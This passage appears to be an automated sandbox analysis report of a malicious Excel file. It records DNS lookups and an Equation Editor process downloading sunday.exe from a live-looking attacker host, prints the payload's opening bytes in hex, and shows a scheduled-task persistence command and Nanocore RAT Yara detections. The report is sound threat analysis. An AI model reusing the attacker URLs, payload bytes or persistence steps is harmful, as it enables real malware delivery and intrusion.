                      Icon Hash:e4e2aa8aa4b4bcb4

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      10/25/21-09:13:53.969144UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
                      10/25/21-09:14:00.203823UDP254DNS SPOOF query response with TTL of 1 min. and no authority53578058.8.8.8192.168.2.22
                      10/25/21-09:14:06.556481UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                      10/25/21-09:14:06.575598UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                      10/25/21-09:14:13.125618UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591858.8.8.8192.168.2.22
                      10/25/21-09:14:13.144481UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591858.8.8.8192.168.2.22
                      10/25/21-09:14:19.370276UDP254DNS SPOOF query response with TTL of 1 min. and no authority53556168.8.8.8192.168.2.22
                      10/25/21-09:14:25.667668UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499728.8.8.8192.168.2.22
                      10/25/21-09:15:02.100984UDP254DNS SPOOF query response with TTL of 1 min. and no authority53498948.8.8.8192.168.2.22
                      10/25/21-09:15:08.320510UDP254DNS SPOOF query response with TTL of 1 min. and no authority53646458.8.8.8192.168.2.22
                      10/25/21-09:15:14.555502UDP254DNS SPOOF query response with TTL of 1 min. and no authority53537458.8.8.8192.168.2.22
                      10/25/21-09:15:14.582456UDP254DNS SPOOF query response with TTL of 1 min. and no authority53537458.8.8.8192.168.2.22
                      10/25/21-09:15:20.829889UDP254DNS SPOOF query response with TTL of 1 min. and no authority53543588.8.8.8192.168.2.22

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 25, 2021 09:13:41.482481003 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.513238907 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.513415098 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.513740063 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545149088 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545701027 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545732975 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545742035 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545763016 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545785904 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545790911 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545805931 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545825958 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545852900 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545852900 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545871973 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545876980 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545898914 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545912027 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.545917034 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.545975924 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.546017885 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.583882093 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.584654093 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.584707022 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585706949 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585736036 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585760117 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585782051 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585786104 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585798979 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585803032 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585807085 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585809946 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585829020 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585832119 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585853100 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585858107 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585875988 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585884094 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585903883 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585906029 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585930109 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585941076 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585952997 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.585958004 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585977077 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.585979939 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586002111 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586003065 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586026907 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586035013 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586050034 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586057901 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586072922 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586075068 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586091995 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586096048 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.586117029 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.586139917 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.617654085 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617681026 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617698908 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617716074 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617727995 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617748976 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617768049 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617784977 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617798090 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617810965 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617825031 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617841959 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617854118 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617870092 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617885113 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617901087 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617917061 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617929935 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617947102 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617959023 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617974997 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.617990971 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.618002892 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.618020058 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.618040085 CEST804916731.3.244.76192.168.2.22
                      Oct 25, 2021 09:13:41.622081041 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622103930 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622108936 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622112036 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622113943 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622117043 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622119904 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622123003 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622126102 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622128963 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622132063 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622134924 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622138023 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622142076 CEST4916780192.168.2.2231.3.244.76
                      Oct 25, 2021 09:13:41.622144938 CEST4916780192.168.2.2231.3.244.76

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 25, 2021 09:13:41.421559095 CEST5216753192.168.2.228.8.8.8
                      Oct 25, 2021 09:13:41.445800066 CEST53521678.8.8.8192.168.2.22
                      Oct 25, 2021 09:13:53.948606968 CEST5059153192.168.2.228.8.8.8
                      Oct 25, 2021 09:13:53.969144106 CEST53505918.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:00.183928013 CEST5780553192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:00.203823090 CEST53578058.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:06.534199953 CEST5903053192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:06.556480885 CEST53590308.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:06.557097912 CEST5903053192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:06.575598001 CEST53590308.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:13.105544090 CEST5918553192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:13.125617981 CEST53591858.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:13.126308918 CEST5918553192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:13.144480944 CEST53591858.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:19.349328995 CEST5561653192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:19.370275974 CEST53556168.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:25.646986008 CEST4997253192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:25.667668104 CEST53499728.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:31.912081003 CEST5177153192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:31.930458069 CEST53517718.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:36.928008080 CEST5986753192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:36.950468063 CEST53598678.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:43.274935007 CEST5031553192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:43.293765068 CEST53503158.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:49.628190041 CEST5007253192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:49.646646023 CEST53500728.8.8.8192.168.2.22
                      Oct 25, 2021 09:14:55.832179070 CEST5430453192.168.2.228.8.8.8
                      Oct 25, 2021 09:14:55.850713968 CEST53543048.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:02.080456972 CEST4989453192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:02.100984097 CEST53498948.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:08.278846025 CEST6464553192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:08.297538042 CEST53646458.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:08.298084974 CEST6464553192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:08.320509911 CEST53646458.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:14.537339926 CEST5374553192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:14.555501938 CEST53537458.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:14.566324949 CEST5374553192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:14.582456112 CEST53537458.8.8.8192.168.2.22
                      Oct 25, 2021 09:15:20.808599949 CEST5435853192.168.2.228.8.8.8
                      Oct 25, 2021 09:15:20.829889059 CEST53543588.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 25, 2021 09:13:41.421559095 CEST192.168.2.228.8.8.80x5686Standard query (0)itisalllove.servepics.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:13:53.948606968 CEST192.168.2.228.8.8.80x58d3Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:00.183928013 CEST192.168.2.228.8.8.80x9818Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:06.534199953 CEST192.168.2.228.8.8.80xf97bStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:06.557097912 CEST192.168.2.228.8.8.80xf97bStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:13.105544090 CEST192.168.2.228.8.8.80xb14dStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:13.126308918 CEST192.168.2.228.8.8.80xb14dStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:19.349328995 CEST192.168.2.228.8.8.80x6ca2Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:25.646986008 CEST192.168.2.228.8.8.80x83dStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:31.912081003 CEST192.168.2.228.8.8.80xa13eStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:36.928008080 CEST192.168.2.228.8.8.80x4e19Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:43.274935007 CEST192.168.2.228.8.8.80x11d9Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:49.628190041 CEST192.168.2.228.8.8.80xb417Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:55.832179070 CEST192.168.2.228.8.8.80xe8a6Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:02.080456972 CEST192.168.2.228.8.8.80x1e64Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:08.278846025 CEST192.168.2.228.8.8.80x9d1bStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:08.298084974 CEST192.168.2.228.8.8.80x9d1bStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:14.537339926 CEST192.168.2.228.8.8.80xe8b7Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:14.566324949 CEST192.168.2.228.8.8.80xe8b7Standard query (0)newme122.3utilities.comA (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:20.808599949 CEST192.168.2.228.8.8.80x9fbaStandard query (0)newme122.3utilities.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 25, 2021 09:13:41.445800066 CEST8.8.8.8192.168.2.220x5686No error (0)itisalllove.servepics.com31.3.244.76A (IP address)IN (0x0001)
                      Oct 25, 2021 09:13:53.969144106 CEST8.8.8.8192.168.2.220x58d3No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:00.203823090 CEST8.8.8.8192.168.2.220x9818No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:06.556480885 CEST8.8.8.8192.168.2.220xf97bNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:06.575598001 CEST8.8.8.8192.168.2.220xf97bNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:13.125617981 CEST8.8.8.8192.168.2.220xb14dNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:13.144480944 CEST8.8.8.8192.168.2.220xb14dNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:19.370275974 CEST8.8.8.8192.168.2.220x6ca2No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:25.667668104 CEST8.8.8.8192.168.2.220x83dNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:31.930458069 CEST8.8.8.8192.168.2.220xa13eNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:36.950468063 CEST8.8.8.8192.168.2.220x4e19No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:43.293765068 CEST8.8.8.8192.168.2.220x11d9No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:49.646646023 CEST8.8.8.8192.168.2.220xb417No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:14:55.850713968 CEST8.8.8.8192.168.2.220xe8a6No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:02.100984097 CEST8.8.8.8192.168.2.220x1e64No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:08.297538042 CEST8.8.8.8192.168.2.220x9d1bNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:08.320509911 CEST8.8.8.8192.168.2.220x9d1bNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:14.555501938 CEST8.8.8.8192.168.2.220xe8b7No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:14.582456112 CEST8.8.8.8192.168.2.220xe8b7No error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)
                      Oct 25, 2021 09:15:20.829889059 CEST8.8.8.8192.168.2.220x9fbaNo error (0)newme122.3utilities.com23.105.131.228A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • itisalllove.servepics.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.224916731.3.244.7680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      TimestampkBytes transferredDirectionData
                      Oct 25, 2021 09:13:41.513740063 CEST0OUTGET /georgia/city/sunday.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: itisalllove.servepics.com
                      Connection: Keep-Alive
                      Oct 25, 2021 09:13:41.545149088 CEST2INHTTP/1.1 200 OK
                      Date: Mon, 25 Oct 2021 07:13:41 GMT
                      Server: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/8.0.11
                      Last-Modified: Sun, 24 Oct 2021 07:30:25 GMT
                      ETag: "109200-5cf1437cbe55c"
                      Accept-Ranges: bytes
                      Content-Length: 1085952
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/x-msdownload
                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 0b 75 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 88 10 00 00 08 00 00 00 00 00 00 7e a6 10 00 00 20 00 00 00 c0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a6 10 00 4b 00 00 00 00 c0 10 00 a8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 86 10 00 00 20 00 00 00 88 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 05 00 00 00 c0 10 00 00 06 00 00 00 8a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 10 00 00 02 00 00 00 90 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 a6 10 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 9d 00 00 84 5c 00 00 03 00 00 00 f3 00 00 06 38 fa 00 00 eb ab 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 fd 00 00 00 01 00 00 11 2b 02 26 16 28 06 00 00 06 28 07 00 00 06 3a 92 00 00 00 26 20 08 00 00 00 38 37 00 00 00 38 b1 00 00 00 06 07 28 02 00 00 06 0c 20 05 00 00 00 38 20 00 00 00 00 1f 14 28 04 00 00 06 00 00 07 17 58 0b 38 8c 00 00 00 20 08 00 00 00 fe 0e 03 00 fe 0c 03 00 45 0b 00 00 00 16 00 00 00 1a 00 00 00 0a 00 00 00 af ff ff ff 39 00 00 00 64 00 00 00 2a 00 00 00 4e 00 00 00 16 00 00 00 98 ff ff ff 75 00 00 00 20 07 00 00 00 38 c5 ff ff ff 16 0b 20 09 00 00 00 38 b9 ff ff ff 00 00 02 0a 38 eb ff ff ff 26 20 02 00 00 00 38 a5 ff ff ff 28 05 00 00 06 20 04 00 00 00 38 96 ff ff ff 00 20 dc 05 00 00 28 04 00 00 06 20 0a 00 00 00 38 81 ff ff ff 07 06 6f 0e 00 00 0a 3f 43 ff ff ff 20 06 00 00 00 38 6b ff ff ff 00 08 28 03 00 00 06 20 03 00 00 00 38 5a ff ff ff 00 2a 00 00 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 0f 00 00 0a 2a 00 3e 2b 02 26 16 00 fe 09 00 00 28 10 00 00 0a 2a 3e 2b 02 26 16 00 fe 09 00 00 28 11 00 00 0a 2a 2e 2b 02 26 16 00 28 12 00 00 0a 2a 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 13 30 04 00 1d 00 00 00 02 00 00 11 2b 02 26 16 00 7e 01 00 00 04 16 1f 65 28 0b 00 00 06 02 fe 04 0a 38 00 00 00 00 06 2a 00 00 00 13 30 04 00 19 00 00 00 03 00 00 11 2b 02 26 16 00 7e 01 00 00 04
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELua~ @ @0K H.text `.rsrc@@.reloc@B`H\80+&((:& 878( 8 (X8 E9d*Nu 8 88& 8( 8 ( 8o?C 8k( 8Z*J+&o*>+&(*>+&(*.+&(*+&*+&*0+&~e(8*0+&~


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:09:13:19
                      Start date:25/10/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13f9a0000
                      File size:28253536 bytes
                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:09:13:41
                      Start date:25/10/2021
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Imagebase:0x400000
                      File size:543304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:09:13:45
                      Start date:25/10/2021
                      Path:C:\Users\Public\vbc.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\Public\vbc.exe'
                      Imagebase:0xd00000
                      File size:1085952 bytes
                      MD5 hash:5DC1D41E2F9969D85896921F7B4AE261
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      General

                      Start time:09:13:51
                      Start date:25/10/2021
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp'
                      Imagebase:0xa30000
                      File size:179712 bytes
                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:09:13:51
                      Start date:25/10/2021
                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                      Imagebase:0x12c0000
                      File size:32768 bytes
                      MD5 hash:72A9F09010A89860456C6474E2E6D25C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmp, Author: Florian Roth
